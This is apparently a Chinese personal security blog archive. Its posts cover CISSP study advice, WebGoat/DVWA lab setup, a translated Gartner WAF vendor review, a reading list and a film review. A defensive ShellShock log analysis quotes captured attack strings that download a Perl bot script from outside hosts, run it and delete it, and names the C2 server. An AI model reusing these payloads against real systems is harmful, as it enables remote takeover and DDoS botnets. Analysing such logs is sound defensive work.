• 截至2016年3月，中国大陆地区持有证书人数为1800人左右。
• CISSP目前在市面上没有题库可以背。ISC2对题库的保护非常严格，严禁通过考试后公开讨论试题。
• CISSP报考是有门槛要求的，通过考试后也必须提交安全行业的从业经历证明，才能拿到证书。

0X02 教材推荐

目前使用人数比较多的CISSP备考教材有以下几本，我逐个分析优劣。

• The Official (ISC)² Guide to the CISSP CBK。这是官方指定的教材。目前出到第四版。紧跟官方考试大纲。没有中文翻译版本，所以读起来会比较考验你的英文阅读能力。但这是我首推的一本书。官方教材还是更贴近考试一些。知识域的划分、概念的讲解都是比较原汁原味的，这对你考试时候理解考题的真实意图非常有帮助。这本书我是精读了一遍的，事实证明真心有用
• Shon Harris的All In One。目前英文版出了第七版，中文版出到第六版。这也是翻译成中文的唯一一本教材。第六版仍旧参考的是老版CBK的知识域结构，这是硬伤。考试大纲调整后重新调整了知识域的架构，考试的侧重点也完全不一样了。比如，物理环境安全一章，AIO讲了一大堆锁、视频监控的东西，其实考纲根本不关心这些细节。最新的第七版我在备考时略读了一遍，架构更合理了，可以作为备选教材。
• CISSP (ISC)² Certified Information Systems Security Professional Official Study Guide。最新版本是第七版。这本书很有意思，完全打散了考纲的架构，作者根据自己的理解重新组织成了21章。这本书我只是拿来做参考用的，行文风格比较口语化，不像CBK那么一板一眼的。不建议作为主力教材复习。
• Eleventh Hour CISSP Study Guide。这本书我也看了看，是大纲型的书籍，知识点不详细展开，整理了一下知识脉络而已。我在高铁上花了两个多小时看了一大半之后，就放弃了这本书。

建议以CBK为主，AIO为辅。CBK的英文看不懂的时候，翻翻AIO的翻译帮助理解记忆。

0X03 测试题选择

市面上现在找不到真题题库，只有各类模拟题。首推CBK课后的练习题，这些对加深记忆非常有用。另外，AIO随书光盘还有一千多道题，我到临考前都没做完。这些题考基础概念比较多，但实际考试中直来直去问概念的题非常少。所以这些题只能帮助你理解概念。
总之，不要期望你做过的模拟题会真的出现在考场上，理解本质最重要。
当你做AIO的题能达到80%的正确率的时候，是时候准备约考试啦！

0X04 有关辅导班

辅导班有用吗？我的经验是，辅导班最大的作用是帮助你梳理知识脉络，以过来人的角度告诉你哪些点可能考的比较多，哪些点出现在考试中的几率非常小。所以，别听他们吹嘘什么通过率90%+，但他们真的可以帮你节省复习时间。

0X05 CISSP的作用及其他

有人说，拿到了CISSP以后年薪可以上浮XX%。我觉得这是辅导班的宣传策略。有人说CISSP不考具体攻防技术，证书没用。我觉得这是唯技术论的一家之言。
备考这八个月，至少帮我梳理了一遍安全所有领域的知识点，扩宽了我的知识面。重新架构了对安全的全面理解，这是最重要的。
实现了2016年的第一个目标，心情还是很愉快的。

最后，住所有备考CISSP的同行们早日通过！

我用下面一个简单的表格，把相关内容汇总在一起做比较，希望能彻底搞清楚，记牢靠。

难免有不准确的地方，希望看到的高人、前辈多多指点。

WebGoat部署最简单，批处理运行一下就可以用了。这里说一点。有时候希望把搭建好的WebGoat提供给内网更多的用户访问，默认情况下只能本机用localhost使用，这就需要修改tomcat的配置。

在WebGoat目录下找到tomcat文件夹，找server_80.xml，里面有一行：

Connector address=”127.0.0.1” port=”80” maxHttpHeaderSize=”8192”

把其中的adress=“127.0.0.1”删掉，保存，然后重启tomcat即可。

这一句的意思是，默认情况下只允许本机环回地址127.0.0.1连接使用。

DVWA部署也不复杂，下载XAMPP装好，注意给mysql设置好root密码。能访问phpmyadmin，就说明一切正常了。

把DVWA解压缩到xampp的htdocs文件夹下即可。

dvwa默认有五个用户：
admin/password
gordonb/abc123
1337/charley
pablo/letmein
smithy/password

另外，如果之前已经部署了WebGoat，80端口被占用，DVWA就起不起来了。

.\xampp\apache\conf\httpd.conf 打开配置文件，把Listen 80 改成其他自定义的端口即可。

没什么含金量，就是给自己留个笔记。

—————————分割线————————————–

waf市场被用户需求驱动，用户需要保护内部和公开的web应用，在web应用本地部署或者远程部署。waf部署在web服务器前面用来保护web应用，对抗内外部攻击者。也可以部署为镜像模式，收集访问日志用于合规审计和分析。waf常见的部署方式是以反向代理的方式串联在网络，因为在历史上这是唯一可以做深度检查的方式。现在，其他部署方式也存在了，比如透明代理、桥模式，或者把waf部署在旁路（带外管理或者镜像模式）。

waf最大的优势是保护企业的web应用免遭由自身代码漏洞造成的缺陷。第二，waf可以与其他应用安全和网络安全技术相集成，比如和应用安全测试（AST）、抗DDOS攻击、web诈骗检测、数据库安全。除此之外，waf有时还包含应用交付功能，包括内容缓存。当waf包含web访问管理模块时，还可以包含身份认证管理特性，比如实现单点登录或web应用分发。

在这个魔力象限中，供应商必须是面向终端用户的waf市场供应者。技术必须包含特定针对web安全保护，超过使用特征匹配的下一代防火墙和ips。waf产品应该支持单一或多台web服务器部署方式。这个魔力象限包含的waf，都是部署在webserver前端的设备，不是webserver插件的方式。包含：

-物理部署设备，虚拟机形态或者软件形态
-waf必须深入应用层控制
-云服务或虚拟化支持，以IaaS平台形式
waf与其他企业安全技术–比如应用安全测试、数据库镜像、SIEM–相集成的能力经常是企业市场中的强劲存在。像ADCs或抗DDoS云服务这类技术，巩固了waf并带来了特殊收益，但是市场还是首先关注客户的web安全需求。尤其重要的是：

-对已知与未知威胁的最大限度的检测和拦截率
-最小的误报率，不影响web应用的连续服务
-高易用性
特别的，Gartner仔细检查了这些特性和创新保护能力，超出下一代防火墙和ips，开源waf比如modsecurity和ironbee。

供应商优劣势分析
梭子鱼

位于加州Campbell市，梭子鱼提供多种信息安全产品。梭子鱼的WAF有三种主要的特性：10种应用模式（5种核心模式，每种包含两个版本）最高可达4Gbps吞吐；可虚拟化；可部署在微软Azure、AWS、vCloud等云计算平台。

过去几个月中，梭子鱼完成支持JSON检测，URL编码，SAML2.0并升级了WAF的管理控制台。

梭子鱼被评价为挑战者，因为产品价格实惠，且效果良好。

优势

• 梭子鱼产品线很广，而且是唯一一家供应商提供Azure和vCloud平台WAF。
• 梭子鱼的waf提供强壮的IP信誉库，cookie保护和客户端指纹识别。它还内嵌了认证功能并整合了一些第三方认证解决方案。
• 梭子鱼为客户提供高级别的地域分散的支持能力，并提供免费的可用性评估服务，四年的设备升级服务。

• 梭子鱼的管理界面提供多种不通语言，包括很多种欧洲语言，并且还有普通话、广东话、日语、韩语。这是其他供应商不具备的优势
  劣势

• Gartner研究发现梭子鱼的管理界面易用性较差。梭子鱼WAF的管理界面升级到V7.9之后，我们还没有收到客户反馈。

• 梭子鱼WAF在安全自动化方面落后于领导者厂商。漏洞扫描的结果必须手动导入。当应用改变后，自动学习默认是禁用的，而必须手动激活。
• Gartner注意到商业客户候选名单很少提及梭子鱼WAf，而是在WAF升级时被考虑。
• 目前还没有5Gbps或10Gbps的模型用以支持商业客户案例。

安恒

安恒，总部位于中国杭州，为web安全和数据库安全提供解决方案。2007年第一款WAF产品发布。同时提供web应用和数据库漏洞扫描，和一款数据库审计平台。
在2014年，安恒升级了硬件产品线，发布了四个模型，发布了WAF v4.0
安恒被评为“特定领域者”，因为安恒只在中国范围内面向中端市场出售WAF解决方案。
在中国，安恒是中小企业，小型金融和政府部门的不错候选品牌。

优势

• 安恒waf包含自学习策略和web应用缓存，可部署为反向代理、透明代理或镜像模式。
• 客户提到选择安恒的原因是不错的价格和本地化服务。

• 安恒的waf可以和供应商的漏洞扫描、数据库安全产品相联动。
  劣势

• 安恒的WAF在以下几个领域落后于竞争对手：基于角色的管理、详细的活动报告、身份认证管理。客户提到管理功能和报告功能还需要提升。

• 安恒的市场知名度非常有限，在中国以外的客户并没有把它列入候选名单。安恒主要服务于中小企业。
• 安恒没有向Gartner提供自己的国际化客户和增值分销商。在公司官网的国际版上仅有非常有限的信息。中国以外的潜在客户在考虑安恒WAF时会要求有同行业案例，并核查供应商与渠道的经验，购买前还会进行设备测试。
• 安恒的战略核心聚焦在漏洞扫描。WAF最近的升级和路线路是很有限的边际改善。

F5
总部位于西雅图的F5是一家聚焦在应用交付领域的基础设施供应商。WAF是作为F5的big-ip应用交付平台的一个软件模块存在的，叫做ASM。经常作为F5的最佳实践组合包的一部分出售。F5其他安全模块包含网络防火墙AFM，接入策略管理APM、以及最近的Web安全网关服务和Web安全网络欺诈保护服务。WAF也在虚拟化版本的big-ip上可以部署使用。WAF是以授权控制的。
2014年，F5发布了一些新的WAf模块，提供了新的提醒，包含抗ddos服务。2015年上半年，还提供了云计算版本的waf服务。
F5被评为”挑战者“。当F5试着移动到”领导者“象限时取得了非常有限的成功。这是一家不错的候选供应商，尤其是对那些看重攻击识别的且已经拥有或正在考虑应用交付设备的大型组织来说。

优势

• 接受调查的客户列出，最大优势是可以把ASM这款waf与F5的应用交付或其他产品相集成。很多Gartner的客户报告称，ASM WAF已经在影响他们选择应用交付产品时的决策。
• F5的合作团队与渠道提供了良好的服务支持，相比主要的WAF供应商，地域覆盖更广。
• ASM WAF使用相同的管理软件，F5的管理员会非常熟悉。客户还可以使用iRules脚本设定策略。
• F5已经在添加一些WAF的新特性，包括对报警评分。

• 作为应用交付的领导级供应商，F5拥有大量保有客户，并利用应用交付销售机会作为WAF产品的销售切入点。对已经购买F5的客户，在已有的安全平台上添加一个WAF模块是容易的。
  劣势

• 用户报告初始化配置和策略设定方面难度很大。在设备重启后，历史报告和自动策略很难维持原状。一些Gartner客户评论说ASM WAF还是很有挑战性的。

• 和其他应用交付为基础的waf一样，F5的waf客户认为waf是作为应用交付的一个扩展属性部署为反向代理模式。这些在F5与纯粹的WAf相比时处于劣势。
• 一些增值分销商也将F5作为他们的增值包中的纯粹防火墙。客户当要考虑F5时，需要寻找一个对产品足够熟悉的合作伙伴。

Fortinet
坐落于加州森尼维尔市的飞塔公司，是一家重要的网络安全厂商。2000年，飞塔作为UTM供应商出现。稍后就扩展了自己的产品线，包含了更多的安全产品，比如WAF（Fortiweb，发布于2008年），应用交付（FortiADC），数据库保护平台。这家公司以其飞塔安全网关而著名，这也是他最有活力的产品线。

飞塔提供了多种产品形态，比如物理形态，或虚拟化形态。都可以部署在反向代理、透明代理，旁路模式。还可以部署在AWS上。功能上包含有ip信誉，反病毒和安全特征升级。

在过去的一年半里，飞塔发布了四次升级（v5.1到v5.4），为知名的web应用添加了模板，支持完全正向保密，支持与SIEM集成。公司还发布了一款入门级产品，FortiWeb 100D，并且还刷新了高端产品序列。

飞塔被评为”特定领域者“，尽管公司有强大的渠道，但是他们的waf解决方案并没有取得商业市场的成功。公司现有的客户和中小组织应该被飞塔认为是潜在客户。

优势

• 良好的声誉，有竞争力的价格，飞塔其他产品的认可度，都是选择飞塔waf的理由。
• 飞塔使用硬件设备实现SSL加解密加速。产品性能的文档非常直接，每种部署方式飞塔的渠道都有详细帮助。
• 客户购买飞塔waf往往是用他的反病毒引擎检测文件共享服务上的恶意软件。Gartner预计，集成沙箱后会进一步提高这种使用场景的实用性。
• 飞塔包含完整的漏洞扫描，带外管理模式，相当数量的预定义报告模板。

• 飞塔还有一系列不错的特性，比如自动学习模式，ip信誉，cookie标记，SSL加速，web应用缓存，机器人识别。
  劣势

• 相较于安全网关，waf只是飞塔的二级产品，渠道销售的积极程度并不高。Gartner认为，本地技术技能可用性比那些与网络防火墙要可怕。

• 客户反馈在普通环境中部署waf后需要很长时间来调整，以避免误报。
• 飞塔并没有在他们的应用交付产品中提供WAF功能。也没有在云服务中提供waf功能。对于安全意识较强的组织，厂商并没有提供硬件安全模块集成或基于云的ddos防护。
• waf与其他飞塔产品的集成也很有限，除了统一的日志分析模块外，这对于飞塔客户来说限制了收益。
• 飞塔的waf大多出现在为满足合规要求时。

Imperva
英普华位于加州，拥有很长的WAF产品线。其他产品聚焦在数据安全，例如数据库审计、数据库防火墙，文件监控，应用层DDOS防护，云计算保护。还有两个包用于安全监控和管理。

早期英普华产品以透明桥方式部署。这与企业保持一致，因为这种部署方式更容易被应用在应用交付产品之后，而不引入第二级代理，而且产品测试时更容易。其他竞争对手被收购或消失，英普华在这个领域持续增长。

英普华Incapsula是基于云计算的waf，被集成在其他服务中，比如DDOS防护。ThreatRadar是附加订阅服务，包含四种功能：信誉库，反僵尸，反欺诈，社区防御。以虚拟化应用的形式可以在AWS上部署waf，七层流量高达10Gbps。物理形态和虚拟化形态都可提供专用管理。

Gartner看到英普华WAF很棒的攻击检出率，厂商还提供了良好的第三方生态系统，包含DLP，反欺诈，SIEM和漏洞扫描。

英普华被评为”领导者“，他们的安全特性和创新处于领先水平，价格方面与竞争对手不相上下。英普华对于各个级别的组织都是非常好的候选厂商，尤其是高安全级别要求的客户，或者寻找易部署、基于云的waf的客户。

优势

• Gartner看到英普华一贯得分很高表现亮眼，以高效率防护，良好的报告，而不是检测率，在Gartner的客户中赢得了出色评价。在售后服务方面，客户反馈也很好。
• 英普华持续领跑WAF市场，发布新的功能，迫使竞争对手跟随作出反应。这还包括一些防护效果更好的高级技术，这是竞争对手所不具备的。因此，当你需要寻找与应用交付不同供应商，且对防护效果非常看重时，这是一家很好的备选供应商。而有些客户使用英普华的“manager of manager”选项，这也说明产品曾部署在大型案例中。
• 供应商一直在努力且有效的传达一种讯息，WAF可以用来响应数据中心的应用层威胁状态，例如集成 Incapsula WAF 和Skyfence CASB实现。英普华在对web攻击的研究与威胁报告方面一直做的非常棒。
• 通过waf即服务的Incapsula，和本地部署的SecureSphere，英普华在商业客户和中小客户中占据了大量市场。当客户的应用安全需要改变时，这也为他们提供了一个新的选择：英普华。

• 英普华本地部署的waf，在客户的评价非常好，因此也在以此对抗云端waf。
  劣势

• 作为优质商业产品，英普华通常对于中小客户和部署waf只为应对合规检查的项目来说太高端了。而价格是客户选择其他waf解决方案的主要原因。当有应用交付类厂商参与竞争时，这一点尤其如此。

• 尽管英普华在安全能力上被评为得分最高，英普华仍然面对来自应用交付类厂商最多的竞争。而他们往往已经在客户那里成功部署了一些产品，只需再买一个授权key就能实现waf的功能。这类客户并不愿为此多花一大笔钱。
• 英普华的渠道与销售团队经常相客户兜售数据库安全集成解决方案，这给客户们带来了一定压力，这也会造成web安全项目总价过高。同时，由于需要不断与数据和网络相关人员讨论并展示一些收益，这也延长了采购周期。
• 客户反馈偶尔管理控制台会失效，尤其是部署了应用集群时。
• 英普华目前只支持aws一个云计算平台，而其他竞争对手往往支持更多的云平台。

绿盟科技
绿盟是一家中国北京的公司，起步于2000年，最早提供抗DDOS解决方案。后来延伸了产品线，包含IPS，漏洞扫描。waf最早发布于2007年。可以物理设备或虚拟化版本交付，可部署为反向代理、透明代理模式，支持带外管理。绿盟同时提供了一套集中管理软件，用于管理waf产品。

供应商最近宣布支持IPv6，并发布面向中端市场的高端waf产品。

绿盟被评为“特定领域者”，他们市场聚焦在亚太地区。对于中国的大中小型客户，和已购买绿盟产品的客户来说，这是一家不错的备选供应商。

优势

• 客户选择绿盟的waf，经常反馈他们有竞争力的价格和性能，尤其是低延迟，这是有决定性的因素。绿盟最近专门为日本客户新增了一种区域性GUI界面。
• 当检测到网络拥塞时，waf可以把入站流量重定向到绿盟的抗DDOS设备过滤后再回流。
• waf拥有很不错的本地与全球产品认证，包括ICSA实验室的waf认证。

• waf可以和她们家自己的漏洞扫描产品集成。
  劣势

• 在中国以外区域，绿盟知名度较低。他的国际渠道的技术投资仍旧落后于其他产品。这也限制了当地技术能力的支持。

• 在一些企业级功能上，绿盟的waf一直落后于“领导者”级别的企业。比如有限的基于角色的管理，主主集群也限定为两台设备，没有ssl加速。
• 绿盟的waf不提供身份认证功能。
• 客户反馈自学习功能本可以更容易微调的。
• 虽然绿盟的waf可以与自家的漏洞扫描集成，但是，目前为止并不能与其他第三方SIEM或者漏洞扫描集成。

Radware

radware是一家以色列特拉维夫的公司，主要提供应用交付和安全产品。他们的安全产品包含混合型DDOS防护工具（DefensePro），ddos保护虚拟设备（DefenseFlow），ddos保护管理服务（DefensePipe）和waf。产品可以单独购买，也可以与AMS集成在一起。他们的waf发布与2010年。可以物理设备或虚拟机形态提供。产品可以集中管理，监控与报告解决方案。

自从2014年，radware并没有为waf发布新的型号。他们提供更新的服务，包括基于云的全面管理和WAF的内部部署全面管理WAF服务。同时提供waf的带外管理部署方式。

Gartner评价radware为“特定领域者”，因为他们尽管最近很努力，仍然是服务于大中型企业客户。

优势

• 在其他的部署方案，AppWall可在透明网桥模式，同时提供反向代理功能，以特定的流量进行部署。通过自学习功能，waf很容易部署，而且无需修改网络配置。
• 选择他们的主要两个原因，一是价格，二是考察客户安全性。
• radware的waf控制台包含强大的多租户功能，并集成了认证与单点登录模块。

• 在过去三年中，他们坚持自己的路线图在反战，相比这一象限其他供应商来说，他们展示了坚定的承诺与执行力。
  劣势

• 不能与第三方漏洞扫描和数据库安全解决方案相集成。

• waf仍旧是应用交付平台的一个模块，与其他竞争对手来说这是个劣势。
• 知名度较低，只在很少的几个客户中提到。

——————-分割线—————

最后附上报告英文原文：点击下载

今年因为家庭，因为工作，拖到现在才盘点，也是真有点说不过去。还是回顾自己在过去一年读过的书吧，算是画个句号。

这是在http://readingtaste.com/ 统计出，我使用豆瓣标记的读书记录。猛一看，自己都有点吃惊。没想到阅读速度会这么快，而这个阅读总量也是历年最大了。后来仔细想了想，这里是有出入的。2014年底读的6本书，我是在2015年1月份才在豆瓣上标记和评论的，也被包含在内了。准确数字应该是23本。比去年多了一本。略微有进步。

今年读书不仅限于纸质书，也开始在移动端看电子书了。最开始是用豆瓣阅读看看知乎周报一类的杂志，后来开始用京东阅读app看电子书。京东阅读有一个很赞的功能，畅读。每个月花上5元钱，书城的各类书都可以随意看，但是不能下载和保存。其实相当于花5元钱去京东的图书馆里借阅的意思。这样就不用担心买回来的书不喜欢了。看过一遍之后，确实喜欢，才去买一本实体书读第二遍、第三遍，吸收的内容也更充分。通过这个app，我看完了《打造Facebook》、《文武北洋》、《台湾往事》。这些还不算在总的阅读记录里。

选几本五星推荐的书列出来吧。

1.《茶之路》 ☆☆☆☆☆

这本书沿着一年茶叶制作的路线，跑遍了中国几乎全部茶叶产区，历数了绿、白、黄、青、红、黑六大茶类各个代表茶叶的种植、采摘、制作工艺和品评特点。穿插了种茶人和制茶人的故事。所以不要以为这是一本专业著作，其实一点都不枯燥，知识性非常强，干货满满，读起来还非常轻松愉快。

我一向认为，喜欢一样东西，无论是喝茶还是玩手串，都要搞明白搞细致搞透彻了，这才是真正的玩。泛泛的“好喝、好听、好看”，那个层次未免太浅了。这本书就是一本爱茶人的必备宝典。

2.《美国宪政历程– 影响美国的25个司法大案》☆☆☆☆☆

在网上经常看到有人推荐有关美国政治的书，都会推荐林达的《近距离看美国》系列，或者刘瑜的《民主的细节》，但这本大部头很少有人提及。幸运的是，我先看了这本书，才又看了那两本。什么感觉？有一种“这事儿我都知道了，能不能聊点新鲜的”感觉。

《美国宪政历程》，几乎是把美国宪法历史上的重大修正的来龙去脉说的非常清楚了。透过这些案子和过程，你就能很清楚的明白为什么美国的政体是那样的。三权分立究竟是怎么玩的，自由与民主发生碰撞时老美是怎么机智的处理，百姓选举是怎么自下而上维持政府运转的。那两本算是通俗读物吧，能让你知其然。而这本书，更可以让你知其所以然。

3.《最近四十年中国社会思潮》☆☆☆☆

看完一大圈别人家的事儿，也得回过头看看自家。什么是民粹，什么是毛左，什么是新儒家。为什么政府不待见毛左。这些问题曾经困扰我很久。看完这本书，问题基本上有了答案。作者把改革开放以来，社会上最常见的八种思潮依次做了分析。当然，作者是坚定的邓派理论支持者，不然也不会给出版。所以难免在讨论新旧左派、自由派时，会有一些情绪上的倾向性。这也是我扣掉一颗星评价的原因。

我的体会是，只有知道了那个群体的核心诉求是什么，以及这种思想诉求的来源，才能有效率的和对方沟通。除了新儒家以外，我觉得每一种思潮都有可取之处，都不能一概而论的说，这是错误的，这是不好的。

唯一的困惑是，我曾以为自己是自由主义的支持者，看完书之后反而有了一些怀疑。自由主义太过于强调削弱政府作用，会不会形成马太效应？会不会不够公平？

4.《最后的耍猴人》☆☆☆☆

这本书不多评价了，作者把自己看到的、听到的有关耍猴艺人这个群体的故事，全部用文字和大量照片记录下来了，翻开这本书，你就可以接近那个即将消失的群体，了解和触摸他们曾经的生活。

技术类的书籍，2015年看的不太多，读完的有《图解HTTP》、《Wireshark网络分析就这么简单》。还有两本看了一半的，惭愧惭愧。为了应付考试还看了两本教材，但这不算阅读，不计算在内。

宗教类今年看的也不多，只详细看完了《掌中解脱》这两本。这一年可能是最不精进的一年了，因此心灵上的痛苦也是最多的一年。

2016年已经过去了9天，相信这将是不平凡的一年。几个心愿，开列一下，年底来回顾。

1.已经在看CISSP AIO第六版了 ，希望今年可以通过这个考试。

2.Linux、Mysql、Python我同时在各看一本书自学，希望今年能在这三个领域有点收获。

3.今年会有一个项目做，希望顺利做完，别出幺蛾子。

作为华人在硅谷创业成立的安全公司，NetScreen是第一家，也是具有丰碑意义的一家。

至今国内做安全网关设备厂家的研发团队里，都还能看到出自当年那个叱咤风云的NetScreen团队的精英。

下载：传送门

原文：传送门

以此作为2015年博客的最后一篇纪念吧。

预祝各位2016年步步高升！

每隔几天都会看一看边界安全设备的日志，看看都拦下来哪些攻击，有没有漏掉的。10月12号起，拦截了不少利用BASH ShellShock漏洞的攻击数据。攻击源地址几乎遍布全球，攻击目的地址覆盖了公司公布在互联网的所有业务系统，而且发起的时间没有什么规律。唯一显著的特点是，攻击者在短时间内发起攻击的次数比较多，可以判断肯定不是手工操作的。于是，从攻击频率入手分析，兴许能发现点什么。

我把所有这个类型的攻击日志按源地址分组后，再按发起时间做了排序，果然发现一个规律。每个攻击IP发起每轮攻击，基本上都以31次为固定频率，每轮平均耗时15秒。

我又开nmap扫了一下这些攻击源IP，基本上都是世界各地的服务器，跑着各类web应用。按常识，不应该是这些服务器的管理员发起的对我们的攻击，很可能是被黑客当作肉鸡或跳板之后，被黑客当作了攻击工具。

为了弄清楚攻击的全貌，我在边界设备上开始抓包，希望能从攻击数据包里发现一点有价值的信息。抓到一些pcap包之后，用wireshark打开。

注意看，在http包里面，ua字段里插入了破壳漏洞的攻击代码：

() { :;};/usr/bin/perl -e ‘print “Content-Type: text/plain\r\n\r\nXSUCCESS!”;system(“wget -O /dev/null http://www.testvc.it/TESTONLY; curl -O /dev/null http://www.testvc.it/TESTONLY; fetch http://www.testvc.it/TESTONLY; GET http://www.testvc.it/TESTONLY; lwp-download http://www.testvc.it/TESTONLY; lynx http://www.testvc.it/TESTONLY“);’

另外的一个攻击IP发过来的和这个几乎一模一样：

() { :;};/usr/bin/perl -e ‘print “Content-Type: text/plain\r\n\r\nXSUCCESS!”;system(“wget http://tecnoalianza.com/a.log -O /tmp/a.log;curl -O /tmp/a.log http://tecnoalianza.com/a.log;perl /tmp/a.log;rm -rf /tmp/a.log*”);’

攻击者如果利用漏洞成功，就会在我的服务器上从指定的服务器下载一份文件到本地，从格式上看，应该是一份用perl写的脚本。然后在服务器运行这段脚本，接着删除掉。攻击代码并不复杂，长度也比较短，利用起来很方便。

接着，我把http://tecnoalianza.com/a.log 这份文件下载回来，准备研究一下这个脚本，不出意外的话，应该会是一个小木马。没想到刚下载到就被卡巴斯基识别为病毒文件-_-!!

打开这份文件，果然是用perl写的代码。从编写习惯来看，作者写代码还是非常规矩的，对齐、注释，一点也不马虎大意。接近1900行代码，因为没学过perl，读起来还是有一点吃力。大致的功能是，连接cc服务器并回传当前服务器的一些基本信息。接着从cc服务器获取指令，包含有一个ip信息。然后针对这个ip发起常见端口扫描、tcpflood、udpflood等等攻击。

也就是说，如果我的服务器没有打bash的补丁，被shellshock攻击成功后，会下载一个perl脚本，攻击者就可以控制我的服务器，再去攻击其他的计算机。

在perl脚本里，找到了cc服务器的ip：是乌克兰的213.186.118.35

忍不住又用nmap看了下大致情况：

注意看我红圈标注的内容。有没有很喜感。^_^

11月中旬以来，类似的攻击突然就销声匿迹了。就好像发起时候来的那般突然。

总结：

1.该打补丁的时候千万别懒，今天一偷懒，明天就坑爹。

2.是时候学学perl了。

3.如果服务器有杀毒软件，还是可以起到一定作用的。

不是说《夏洛特烦恼》有多不好，而是像《十二公民》这样的好片子，应该得到高票房和高度认可。所以写下这篇不算影评的文字。

故事很简单，法学院的学生要补考英美法课程，需要审理一件富二代杀父的案件，不同社会角色的家长们组成陪审团，在听取学生法庭审理后，将对本案做出最终“判决。众多证据都指向嫌疑人有罪，只有陪审团做出12票全部通过的决议，学生们才算补考通过。陪审团从11：1的局势开始，围坐在一个仓库里开始激烈讨论，最终扭转判断认定嫌疑人无罪。

故事不复杂，场景也极其单一，几乎完全在一个场景里拍完了整部电影。能在几乎唯一的场景里拍完整部片子，而且不枯燥，吸引人看完，还觉得意犹未尽，这种功夫比市面上看到的绝大部分耗费千万制作出来的爆米花大电影，出色的不止一点半点。

当然，导演和众多演员本就是话剧演员出身，这是一个很重要的因素，但如果这样的片子能让观众对话剧产生兴趣，对这种越来越小众的艺术形式产生好奇，这就能让我为导演和主创们鼓掌。

尽管老头那个角色有些台词有些表演话剧味儿重了一些，相对于电影来说，有点出戏。但这种失误，恐怕要远远好于那些唐宋代的人拿着盖碗喝茶的穿帮。

看过电影的人中间，如果能有一半的观众明白无罪推定的意义，体会到冷静而独立思考的价值，这就足以支撑整部片子的意义。

我们总能看到法制社会建设的不足，这和公民普遍法治意识的缺位有密不可分的关系。也只有全社会、大部分公民受到一次又一次法制观念的熏陶，真正在心里有了法制的思维方式，这个社会的法制建设才有了足够的土壤。从这个角度，给这部电影1024个赞，不过分。

所以，不要说什么“在中国拍这种英美法律题材”没有意义，恰恰相反，通识性的知识普及，才最有意义。

人物的刻画上，老戏骨们的表演近乎完美，何冰捡起地上纸团时颤抖的双手，韩童生激动时抽搐的面部肌肉，比其他娱乐大片里假模假样的梨花带雨，不知道要高级多少倍。吃瓦片的房东在地域攻击之后发现得罪了更多人，为了不被孤立赶紧往回找补的样子，相信有过类似生活体验的人一眼就能看出来，对，那个情况下的人，就应该是那种表现。还有小卖铺的老板，演员钱波曾在电视剧《茶馆》里饰演唐铁嘴，也是一个嘴皮子利索的市侩，一个眼神一句台词，都能让人想起自家楼下的那个小老板。

我们不能要求每个配角都飙戏飙出风采，话不多的配角们没有一个掉链子糊弄事儿的，几乎挑不出毛病。

台词写的非常流畅，逻辑推理也严丝合缝。场景太过单一，无法用多种镜头和环境塑造事件，所以只能用精彩的台次表现冲突，而这部片的台词把每个角色由有罪说服到无罪的过程里，让人信服。